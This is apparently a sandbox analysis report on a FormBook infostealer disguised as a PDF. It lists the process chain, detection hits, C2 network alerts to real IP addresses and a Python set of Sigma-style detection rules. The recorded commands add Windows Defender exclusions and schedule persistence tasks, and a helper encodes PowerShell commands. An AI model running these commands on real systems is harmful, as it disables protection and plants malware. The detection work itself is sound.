
Windows Analysis Report
NEW.RFQ00876.pdf.exe

Overview

General Information

Sample name: NEW.RFQ00876.pdf.exe
Analysis ID: 1571204
MD5: 198fadc2115110c8b0b774c88c70215e
SHA1: 619b8af2bf8c70ea469a7866cc4ed78a38bc59c1
SHA256: 78ab8447457bcf006649029303778dc4d8cfb3a3e6e38de1b17d9be17401bc2b
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NEW.RFQ00876.pdf.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
    • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7336 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NEW.RFQ00876.pdf.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
      • aegBDZrMeWOlT.exe (PID: 6804 cmdline: "C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 8080 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
          • aegBDZrMeWOlT.exe (PID: 5412 cmdline: "C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • RAangyFeHdZLco.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe MD5: 198FADC2115110C8B0B774C88C70215E)
    • schtasks.exe (PID: 7976 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RAangyFeHdZLco.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe" MD5: 198FADC2115110C8B0B774C88C70215E)
  • cleanup
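The tree above shows the whole chain in one place: a double-extension dropper (NEW.RFQ00876.pdf.exe) adds Windows Defender exclusions through PowerShell Add-MpPreference, registers a scheduled task from an XML file in %LOCALAPPDATA%\Temp, starts a second copy of itself, and later runs inside msinfo32.exe, which in turn launches firefox.exe. The Python below is an added example, not part of the Joe Sandbox report and not Sigma's or Joe Security's code: it turns the Sigma hits listed in this report into rules over process-creation events, including the base64offset trick behind "Powershell Base64 Encoded MpPreference Cmdlet" (all three base64 alignments of the cmdlet name, so an -EncodedCommand variant is caught without decoding). The event schema (pid, image, cmdline, parent_pid, parent_image) is an assumed Sysmon-like layout, the events are constructed from the tree above, and PIDs 9001 and 1234 are hypothetical events added to exercise the encoded-command and benign cases.

```python
"""Sigma-style rules over process-creation events. Added example, not Joe
Sandbox's or Sigma's code; the event schema is assumed and the events are
constructed from the report's process tree (PIDs 9001 and 1234 are made up)."""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # path of the new process image
    cmdline: str
    parent_pid: int
    parent_image: str   # "" when the parent is unknown


def base64offset_patterns(needle: bytes) -> list:
    """Sigma's base64offset modifier: render `needle` in all three 3-byte
    alignments and keep only the base64 characters that depend solely on the
    needle, so a plain substring search finds it wherever it sits in a blob."""
    pats = []
    for i in range(3):
        enc = base64.b64encode(b"\x00" * i + needle + b"\x00\x00").decode()
        start = -(-8 * i // 6)               # ceil(8i/6): first char wholly inside needle
        end = (8 * (i + len(needle))) // 6   # floor: one past the last such char
        pats.append(enc[start:end])
    return pats


# ASCII form plus the UTF-16LE form that PowerShell's -EncodedCommand uses.
MPPREF_PATTERNS = (base64offset_patterns(b"Add-MpPreference")
                   + base64offset_patterns("Add-MpPreference".encode("utf-16-le")))


def encode_powershell_command(script: str) -> str:
    """The argument PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.exe$", re.I)


def rule_defender_exclusion(e: ProcEvent):
    if basename(e.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    if re.search(r"add-mppreference.*-exclusion", e.cmdline, re.I):
        return "defender_exclusion_cleartext"
    if any(p in e.cmdline for p in MPPREF_PATTERNS):
        return "defender_exclusion_base64"
    return None


def rule_schtasks_temp_xml(e: ProcEvent):
    cl = e.cmdline.lower()
    if basename(e.image) == "schtasks.exe" and "/create" in cl and "/xml" in cl \
            and any(t in cl for t in TEMP_DIRS):
        return "schtasks_temp_xml"
    return None


def rule_double_extension(e: ProcEvent):
    return "double_extension" if DOUBLE_EXT.search(basename(e.image)) else None


def rule_self_spawn(e: ProcEvent):
    # A user-land binary starting an identical copy of itself is the usual shape
    # of self-hollowing; browsers do it too, so allowlist them in production.
    if e.parent_image and e.parent_image.lower() == e.image.lower() \
            and not e.image.lower().startswith("c:\\windows\\"):
        return "self_spawn"
    return None


def rule_msinfo32_child(e: ProcEvent):
    # msinfo32.exe never spawns children on its own; a child means injected code.
    return "msinfo32_child" if basename(e.parent_image) == "msinfo32.exe" else None


RULES = (rule_defender_exclusion, rule_schtasks_temp_xml, rule_double_extension,
         rule_self_spawn, rule_msinfo32_child)


def run_rules(events):
    """Map pid -> list of rule names that fired (pids with no hits are omitted)."""
    hits = {}
    for e in events:
        names = [n for n in (rule(e) for rule in RULES) if n]
        if names:
            hits[e.pid] = names
    return hits


DESKTOP = "C:\\Users\\user\\Desktop\\NEW.RFQ00876.pdf.exe"
DROPPER = ("C:\\Program Files (x86)\\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM"
           "\\aegBDZrMeWOlT.exe")
PS_EXE = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS_CMD = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
MSINFO = "C:\\Windows\\SysWOW64\\msinfo32.exe"

EVENTS = [  # constructed from the report's process tree
    ProcEvent(6360, DESKTOP, f'"{DESKTOP}"', 4056, ""),
    ProcEvent(5884, PS_EXE, f'{PS_CMD} Add-MpPreference -ExclusionPath "{DESKTOP}"', 6360, DESKTOP),
    ProcEvent(7336, "C:\\Windows\\SysWOW64\\schtasks.exe",
              '"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\RAangyFeHdZLco" '
              '/XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmpEC94.tmp"', 6360, DESKTOP),
    ProcEvent(7440, DESKTOP, f'"{DESKTOP}"', 6360, DESKTOP),
    ProcEvent(8080, MSINFO, f'"{MSINFO}"', 6804, DROPPER),
    ProcEvent(4908, "C:\\Program Files\\Mozilla Firefox\\Firefox.exe",
              '"C:\\Program Files\\Mozilla Firefox\\Firefox.exe"', 8080, MSINFO),
    # hypothetical: same exclusion, but hidden behind -EncodedCommand
    ProcEvent(9001, PS_EXE, "powershell.exe -NoProfile -EncodedCommand " + encode_powershell_command(
        'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'), 6360, DESKTOP),
    # hypothetical benign control event
    ProcEvent(1234, "C:\\Windows\\System32\\cmd.exe", '"C:\\Windows\\System32\\cmd.exe" /c dir',
              1000, "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for pid, names in run_rules(EVENTS).items():
        print(pid, ", ".join(names))
```

The cleartext Add-MpPreference rule also fires on legitimate administration, so it is the parent that makes this hit actionable: here the caller is a user-writable binary on the Desktop with a .pdf.exe name, not an admin console. The self_spawn rule needs an allowlist for browsers and other multi-process applications before it is deployed.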
No configs have been found
Source | Rule | Description | Author | Strings
0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, NewProcessName: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, OriginalFileName: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 6360, ProcessName: NEW.RFQ00876.pdf.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, ParentImage: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, ParentProcessId: 7856, ParentProcessName: RAangyFeHdZLco.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp", ProcessId: 7976, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", ProcessId: 7336, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ProcessId: 5884, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe", ParentImage: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe, ParentProcessId: 6360, ParentProcessName: NEW.RFQ00876.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp", ProcessId: 7336, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T06:56:58.918321+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49766 | 85.159.66.93 | 80 | TCP
2024-12-09T06:57:23.798878+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49829 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:39.033503+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49868 | 85.25.177.138 | 80 | TCP
2024-12-09T06:58:11.096549+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49945 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:26.256367+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:41.691427+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49997 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:56.729532+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50001 | 77.68.64.45 | 80 | TCP
2024-12-09T06:59:12.456335+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50005 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:27.583945+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50009 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:42.233654+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50013 | 13.248.169.48 | 80 | TCP
2024-12-09T07:00:02.298681+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50017 | 81.2.196.19 | 80 | TCP
2024-12-09T07:00:22.050641+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50021 | 172.67.215.235 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T06:56:16.750040+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50023 | 172.67.145.234 | 80 | TCP
2024-12-09T06:57:15.822187+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49805 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:18.480511+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49811 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:21.145822+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49820 | 104.21.62.184 | 80 | TCP
2024-12-09T06:57:31.029390+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49845 | 85.25.177.138 | 80 | TCP
2024-12-09T06:57:33.693663+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49851 | 85.25.177.138 | 80 | TCP
2024-12-09T06:57:36.368290+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49861 | 85.25.177.138 | 80 | TCP
2024-12-09T06:58:03.079877+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49923 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:05.808685+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49929 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:08.417208+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49936 | 173.236.199.97 | 80 | TCP
2024-12-09T06:58:18.242015+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49962 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:20.897896+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49968 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:23.583776+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49974 | 203.161.42.73 | 80 | TCP
2024-12-09T06:58:33.671905+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49994 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:36.369431+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49995 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:39.013602+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49996 | 46.30.211.38 | 80 | TCP
2024-12-09T06:58:48.580782+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49998 | 77.68.64.45 | 80 | TCP
2024-12-09T06:58:51.391842+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49999 | 77.68.64.45 | 80 | TCP
2024-12-09T06:58:54.138261+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50000 | 77.68.64.45 | 80 | TCP
2024-12-09T06:59:04.694321+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50002 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:07.117800+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50003 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:09.805906+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50004 | 146.88.233.115 | 80 | TCP
2024-12-09T06:59:19.595436+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50006 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:22.289922+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50007 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:25.010391+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50008 | 217.160.0.200 | 80 | TCP
2024-12-09T06:59:34.246688+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50010 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:36.899515+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50011 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:39.564180+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50012 | 13.248.169.48 | 80 | TCP
2024-12-09T06:59:54.311479+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50014 | 81.2.196.19 | 80 | TCP
2024-12-09T06:59:56.969568+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50015 | 81.2.196.19 | 80 | TCP
2024-12-09T06:59:59.706100+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50016 | 81.2.196.19 | 80 | TCP
2024-12-09T07:00:14.169395+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50018 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:16.710060+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50019 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:19.390029+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50020 | 172.67.215.235 | 80 | TCP
2024-12-09T07:00:28.970978+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50022 | 172.67.145.234 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T06:57:15.822187+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.7 | 49805 | 104.21.62.184 | 80 | TCP


                AV Detection

Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, ReversingLabs: Detection: 50%
Source: NEW.RFQ00876.pdf.exe, ReversingLabs: Detection: 50%
Source: NEW.RFQ00876.pdf.exe, Virustotal: Detection: 49%
Source: Yara match, File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe, Joe Sandbox ML: detected
Source: NEW.RFQ00876.pdf.exe, Joe Sandbox ML: detected
Source: NEW.RFQ00876.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: NEW.RFQ00876.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
